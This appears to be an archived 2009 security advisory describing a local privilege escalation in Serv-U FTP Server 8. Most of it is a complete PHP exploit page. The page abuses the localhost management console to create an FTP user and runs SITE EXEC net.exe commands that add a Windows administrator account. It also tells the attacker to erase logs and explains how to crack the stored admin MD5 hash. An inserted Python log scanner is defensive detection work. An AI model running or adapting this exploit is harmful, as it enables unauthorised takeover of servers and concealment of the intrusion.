myhack58 / 佚名 (anonymous) / MYHACK58:62200924160
History: Aug 05, 2009 - 12:00 a.m.

Serv-U FTP Server v8 local privilege escalation vulnerability warning

2009-08-05 00:00:00
佚名 (anonymous)
www.myhack58.com

Author: kxlzx (www.inbreak.net)

**Release date:**2009-08-05 **Updated date:**2009-08-05

Affected systems:
Serv-U 8

Not affected systems:
Other versions are not affected

Description:
I saw on cnbeta that Serv-U 8 had been released.
I had written a local privilege escalation for version 7 before.
I did not know what had changed on the security side in version 8.
I downloaded it for research and found that privilege escalation is still possible; the Serv-U 7 method cannot be used directly, but works with slightly modified execution steps.

The Serv-U 8 management platform is HTTP-based, inherited from the Serv-U 7 design.
Capturing and analysing the traffic, I found the following behaviour can be exploited:
1. When the administrator opens the web page from the Management Console, no password verification is required.
2. If the administrator opens the web page via a URL, a password is requested, but whatever is entered is accepted: "/?Session=39893&Language=zh,CN&LocalAdmin=1"
3. The administrator can add two kinds of users, a global user or a domain user. Likewise there are two kinds of permission sets, global ones and per-user ones.
4. The packet in which the administrator adds a user and the packet that sets that user's permissions are separate.
So I captured the packets and converted them into PHP socket POSTs.
Finally, log in over classic FTP and exec commands to escalate privileges.

Much has been said about Serv-U 7 before, so here it is kept as short as possible.
... logging in and so on.
1. Obtain the ID.
2. Add the permission to this ID.
3. Give the ID a user name, password, directory and permissions.
4. After logging in, execute the system commands.

This code is not meant to be used directly as a tool.
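From the defender's side, the request sequence described above is what a log review should look for. The following Python is an added example (not code from the advisory or its author): it scans log lines for the `/?Session=...&LocalAdmin=1` console URL, `AddObject`/`UpdateObject` calls on `COrganization.<id>.User` and `CUser.<id>.DirAccess`, and `SITE EXEC` commands that run `net.exe ... /add`, then flags a client that shows both console manipulation and `SITE EXEC` as the complete chain. The log format and every sample line are constructed for this example; only the URL paths, query parameters and the command shapes come from the advisory text.

```python
"""Added example, not from the advisory: flag Serv-U 8 console-abuse and
SITE EXEC patterns in log lines.  The log format and all sample lines are
constructed for illustration; only the URL paths, query parameters and the
SITE EXEC command shape come from the advisory text."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log: "<client-ip> <HTTP|FTP> <request line or FTP command>"
SAMPLE_LOG = """\
127.0.0.1 HTTP GET /?Session=39893&Language=zh,CN&LocalAdmin=1
127.0.0.1 HTTP POST /Web%20Client/Login.xml?Command=Login&Sync=1543543543543543
10.0.0.5 HTTP POST /Web%20Client/Login.xml?Command=Login&Sync=1
127.0.0.1 HTTP POST /Admin/XML/User.xml?Command=AddObject&Object=COrganization.2.User&Temp=1&Sync=5
127.0.0.1 HTTP POST /Admin/XML/Result.xml?Command=AddObject&Object=CUser.7.DirAccess&Sync=6
127.0.0.1 HTTP POST /Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.2.User.7&Sync=8
127.0.0.1 FTP USER lalala_hacked
127.0.0.1 FTP SITE EXEC c:/windows/system32/net.exe user lalala_hacked Secret1 /add
127.0.0.1 FTP SITE EXEC c:/windows/system32/net.exe localgroup administrators lalala_hacked /add
10.0.0.9 FTP SITE HELP
"""

LINE_RE = re.compile(r"^(?P<ip>\S+)\s+(?P<proto>HTTP|FTP)\s+(?P<rest>.*)$")
# Object ids of the form COrganization.<id>.User or COrganization.<id>.User.<uid>
USER_OBJECT_RE = re.compile(r"^COrganization\.[^.]+\.User(\.|$)")


def classify(line):
    """Return the finding tags for one log line; an empty list means nothing notable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return []
    proto, rest = m.group("proto"), m.group("rest")
    findings = []
    if proto == "HTTP":
        _method, _, target = rest.partition(" ")
        parts = urlsplit(target)
        qs = parse_qs(parts.query)
        cmd = qs.get("Command", [""])[0]
        obj = qs.get("Object", [""])[0]
        # The "LocalAdmin=1" session URL the advisory says accepts any password.
        if parts.path == "/" and qs.get("LocalAdmin") == ["1"] and "Session" in qs:
            findings.append("localadmin-session-url")
        if parts.path.startswith("/Admin/XML/"):
            if cmd in ("AddObject", "UpdateObject") and USER_OBJECT_RE.match(obj):
                findings.append("admin-user-" + cmd.lower())
            if cmd == "AddObject" and obj.endswith(".DirAccess"):
                findings.append("admin-diraccess-add")
    else:  # FTP command channel
        words = rest.split()
        if len(words) >= 2 and words[0].upper() == "SITE" and words[1].upper() == "EXEC":
            findings.append("site-exec")
            tail = " ".join(words[2:]).lower()
            if "net.exe" in tail or tail.startswith("net "):
                if " /add" in tail:
                    findings.append("net-account-add")
                if "localgroup administrators" in tail:
                    findings.append("net-localgroup-admin")
    return findings


def scan(log_text):
    """Aggregate findings per client IP and return (per_ip, high_severity_ips).

    An IP is high severity when console user/permission manipulation and a
    SITE EXEC command both appear for it, i.e. the full chain in the advisory."""
    per_ip = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        tags = classify(line)
        if tags:
            per_ip.setdefault(m.group("ip"), set()).update(tags)
    high = sorted(ip for ip, tags in per_ip.items()
                  if "site-exec" in tags
                  and any(t.startswith("admin-") or t == "localadmin-session-url" for t in tags))
    return per_ip, high


if __name__ == "__main__":
    per_ip, high = scan(SAMPLE_LOG)
    for ip, tags in sorted(per_ip.items()):
        print(ip, sorted(tags))
    print("high severity:", high)
```

Because the management console listens on 127.0.0.1:43958, the client address of the console requests will be localhost in real logs, so in practice the correlation key is the host plus a short time window rather than a remote IP; the per-IP grouping here is only the simplest stand-in for that.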

Source: kxlzx (www.inbreak.net)

Test method:

The following procedures (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk!

<?php
/*
serv-u 8 local exp ver 1.0
If you find this file on your own server... that's too bad, don't come looking for me.
This file is everywhere; anyone can get it.
*/

?>
<html>
<title>Serv-u 8 local exp ver 1.0</title>
<body>
<script>
function fun_showDiv(show)
{
    document.getElementById(show).style.display = "block";
}
</script>
<b>Serv-u 8 local exp ver 1.0</b>
<form id="form1" name="form1" method="post" action="?">
<p><a href="#" onclick="fun_showDiv('adminpassdiv')">admin password</a>
<input type="text" name="admin_pwd" value="" />
</p>
<p>escalate privileges directly!
<input type="submit" name="cmd" value="right" />
<a href="#" onclick="fun_showDiv('QAdiv')">QA</a>
</p>
<pre>

<?php

// Global vars
$port = 43958;                       // Serv-U management console port (listens on localhost)
$host = "127.0.0.1";
$sessionid = "";
$getuserid = "";
$ftpport = 21;
$ftpuser = "lalala_hacked";
$ftppwd = $_POST['admin_pwd'];       // administrator password entered in the form
$exec_addUser = "site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";
$exec_addGroup = "site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser." /add";

if ($_POST['cmd']) {

//login-----------------------------------------
$sock_login = fsockopen($host, $port);
$URL = '/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
$post_data_login['user'] = "";
$post_data_login['pword'] = $ftppwd;
$post_data_login['language'] = "zh%2CCN&";
$ref = "http://".$host.":".$port."/?Session=39893&Language=zh,CN&LocalAdmin=1";
$postStr = createRequest($port, $host, $URL, $post_data_login, $sessionid, $ref);
fputs($sock_login, $postStr);
$result = fread($sock_login, 1280);
$sessionid = getmidstr("<sessionid>", "</sessionid>", $result);
if ($sessionid != "")
    echo "login success!";
fclose($sock_login);
//login-----------------------------------------

//getOrganizationId-------------------------------
$OrganizationId = "";
$sock_OrganizationId = fsockopen($host, $port);
$URL = '/Admin/ServerUsers.htm?Page=1';
$postStr = createRequest($port, $host, $URL, "", $sessionid, "");
fputs($sock_OrganizationId, $postStr);
$resultOrganizationId = "";
while (!feof($sock_OrganizationId)) {
    $result = fread($sock_OrganizationId, 1024);
    $resultOrganizationId = $resultOrganizationId.$result;
}
$strTmp = "OrganizationUsers.xml&ID=";
$OrganizationId = substr($resultOrganizationId, strpos($resultOrganizationId, $strTmp) + strlen($strTmp), strlen($strTmp) + 15);
$OrganizationId = substr($OrganizationId, 0, strpos($OrganizationId, "\""));
fclose($sock_OrganizationId);
if ($OrganizationId != "")
    echo "get OrganizationId ".$OrganizationId." success!";
//getOrganizationId-------------------------------

//getuserid---------------------------------------
$getuserid = "";
$sock_getuserid = fsockopen($host, $port);
$URL = "/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".$OrganizationId.".User&Temp=1&Sync=546666666666666663";
$ref = "http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";
$post_data_getuserid = "";
$postStr = createRequest($port, $host, $URL, $post_data_getuserid, $sessionid, $ref);
fputs($sock_getuserid, $postStr);
$result = fread($sock_getuserid, 1280);
$result = getmidstr("<var name=\"ObjectID\" val=\"", "\" />", $result);
fclose($sock_getuserid);
$getuserid = $result;
if ($getuserid != "")
    echo "get user ID ".$getuserid." success!";
//getuserid---------------------------------------

//addpower-----------------------------------------
$sock_addpower = fsockopen($host, $port);
$URL = "/Admin/XML/Result.xml?Command=AddObject&Object=CUser.".$getuserid.".DirAccess&Sync=1227081437828";
$post_data_addpower['Access'] = "7999";
$post_data_addpower['MaxSize'] = "0";
$post_data_addpower['Dir'] = "c:\\";
$post_data_addpower['undefined'] = "undefined";
$postStr = createRequest($port, $host, $URL, $post_data_addpower, $sessionid, "http://127.0.0.1:".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_addpower, $postStr, strlen($postStr));
$result = fread($sock_addpower, 1280);
fclose($sock_addpower);

echo "permissions added successfully!";

//addpower-----------------------------------------

//adduser-----------------------------------------
$sock_adduser = fsockopen($host, $port);
$URL = "/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.".$OrganizationId.".User.".$getuserid."&Sync=1227071190250";
$post_data_adduser['LoginID'] = $ftpuser;
$post_data_adduser['FullName'] = "";
$post_data_adduser['Password'] = '!';
$post_data_adduser['ComboPasswordType'] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";
$post_data_adduser['PasswordType'] = "0";
$post_data_adduser['ComboAdminType'] = "%E6%97%A0%E6%9D%83%E9%99%90";
$post_data_adduser['AdminType'] = "";
$post_data_adduser['ComboHomeDir'] = "/c:";
$post_data_adduser['HomeDir'] = "/c:";
$post_data_adduser['ComboType'] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";
$post_data_adduser['Type'] = "0";
$post_data_adduser['ExpiresOn'] = "0";
$post_data_adduser['ComboWebClientStartupMode'] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";
$post_data_adduser['WebClientStartupMode'] = "";
$post_data_adduser['LockInHomeDir'] = "0";
$post_data_adduser['Enabled'] = "1";
$post_data_adduser['AlwaysAllowLogin'] = "1";
$post_data_adduser['Description'] = "";
$post_data_adduser['IncludeRespCodesInMsgFiles'] = "";
$post_data_adduser['ComboSignOnMessageFilePath'] = "";
$post_data_adduser['SignOnMessageFilePath'] = "";
$post_data_adduser['SignOnMessage'] = "";
$post_data_adduser['SignOnMessageText'] = "";
$post_data_adduser['ComboLimitType'] = "%E8%BF%9E%E6%8E%A5";
$post_data_adduser['LimitType'] = "Connection";
$post_data_adduser['QuotaBytes'] = "0";
$post_data_adduser['Quota'] = "0";
$post_data_adduser['Access'] = "7999";
$post_data_adduser['MaxSize'] = "0";
$post_data_adduser['Dir'] = "%25HOME%25";
$postStr = createRequest($port, $host, $URL, $post_data_adduser, $sessionid, "http://127.0.0.1:".$port."/Admin/ServerUsers.htm?Page=1");
fputs($sock_adduser, $postStr, strlen($postStr));
$result = fread($sock_adduser, 1280);
fclose($sock_adduser);

echo "added user successfully!";
//adduser-----------------------------------------

//exec-------------------------------
$sock_exec = fsockopen("127.0.0.1", $ftpport, $errno, $errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);

$sendbuf = "PASS !\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);

$sendbuf = $exec_addUser."\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);
echo "executing ".$exec_addUser." returned $recvbuf";
fclose($sock_exec);

$sock_exec = fsockopen("127.0.0.1", $ftpport, $errno, $errstr, 10);
$recvbuf = fgets($sock_exec, 1024);
$sendbuf = "USER ".$ftpuser."\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);

$sendbuf = "PASS !\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1024);

$sendbuf = $exec_addGroup."\r\n";
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1024);

echo "executing ".$exec_addGroup." returned $recvbuf";
fclose($sock_exec);
echo "well, your 3389 is up; clean up the ftp users and the log right now!";
//exec-------------------------------

}

/** function createRequest
 * @port_post      : administrator port, e.g. $port = 43958;
 * @host_post      : host, e.g. $host = "127.0.0.1";
 * @URL_post       : target, e.g. $URL = '/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';
 * @post_data_post : array, e.g. $post_data['user'] = ""; ...
 * @return HTTP request string
 */
function createRequest($port_post, $host_post, $URL_post, $post_data_post, $sessionid, $referer)
{
    // Build the url-encoded form body from the key/value array (empty string means no body)
    $data_string = "";
    if (is_array($post_data_post))
    {
        $values = array();
        foreach ($post_data_post as $key => $value)
        {
            $values[] = "$key=".urlencode($value);
        }
        $data_string = implode("&", $values);
    }
    $request  = "POST ".$URL_post." HTTP/1.1\r\n";
    $request .= "Host: ".$host_post."\r\n";
    $request .= "Referer: ".$referer."\r\n";
    $request .= "Content-type: application/x-www-form-urlencoded\r\n";
    $request .= "Content-length: ".strlen($data_string)."\r\n";
    $request .= "User-Agent: Serv-U\r\n";
    $request .= "x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)\r\n";
    $request .= "Accept: */*\r\n";
    $request .= "Cache-Control: no-cache\r\n";
    $request .= "UA-CPU: x86\r\n";

    if ($sessionid != "")
    {
        $request .= "Cookie: Session=".$sessionid."\r\n";
    }
    $request .= "\r\n";
    $request .= $data_string."\r\n";

    return $request;
}

// getmidstr: return the text between $L and $R in $str (copied from the internet)
function getmidstr($L, $R, $str)
{
    $int_l = strpos($str, $L);
    $int_r = strpos($str, $R);
    if ($int_l !== false && $int_r !== false)
    {
        $str_put = substr($str, $int_l + strlen($L), ($int_r - $int_l - strlen($L)));
        return $str_put;
    }
    else
        return "not found required variable";
}
?>
</pre>
</form>
<div id="adminpassdiv" style="display:none">
<pre>
The default is empty; if the password is empty, <b>fill in anything.</b>
If it has been changed, the administrator password is by default stored here:
<b>C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive</b>
Find the MD5 password value in that file.
C:\Program Files\RhinoSoft.com\Serv-U
is the Serv-U root directory.
The password value looks like this (assuming the password is 123456):
kx#######################
# stands for the 32-character MD5 hash of 123456, and kx is the random 2-character string Serv-U adds to the MD5 algorithm.
After cracking, the password comes out as <b>kx</b>123456; remove the kx to get the password.
You can generate a dictionary for this encryption scheme.

</pre>
</div>
<div id="QAdiv" style="display:none">
<pre>
<b>How does the privilege escalation work?</b>
The Serv-U 8 management platform is HTTP-based, inherited from the Serv-U 7 design.
Capturing and analysing the traffic, I found the following behaviour can be exploited:
1. When the administrator opens the web page from the Management Console, no password verification is required.
2. If the administrator opens the web page via a URL, a password is requested, but whatever is entered is accepted: "/?Session=39893&Language=zh,CN&LocalAdmin=1"
3. The administrator can add two kinds of users, a global user or a domain user. Likewise there are two kinds of permission sets, global ones and per-user ones.
4. The packet in which the administrator adds a user and the packet that sets that user's permissions are separate.
So I captured the packets and converted them into PHP socket POSTs.
Finally, log in over classic FTP and exec commands to escalate privileges.

Much has been said about Serv-U 7 before, so here it is kept as short as possible.
... logging in and so on.
1. Obtain the ID.
2. Add the permission to this ID.
3. Give the ID a user name, password, directory and permissions.
4. After logging in, execute the system commands.

<b>Why does it report success, but the escalation did not happen?</b>
It depends on the error codes; I am rather ashamed to say I did not write detailed error-code checking here.
Generally it is one of the following cases:
1. The administrator password may be wrong.
   See the "admin password" link.
2. The administrator may have restricted execution of SITE EXEC.
   This would need a change to the program; a function could be added so that it is not subject to this restriction.
3. It may be a bug in the program.

</pre>
</div>
</body>
</html>

Recommendation:
The vendor currently has no patch; do we wait for one?
When the Serv-U 7 local overflow came out earlier, I did not see any reaction either. -_-!
For now, make the local management password more complex to cope with it.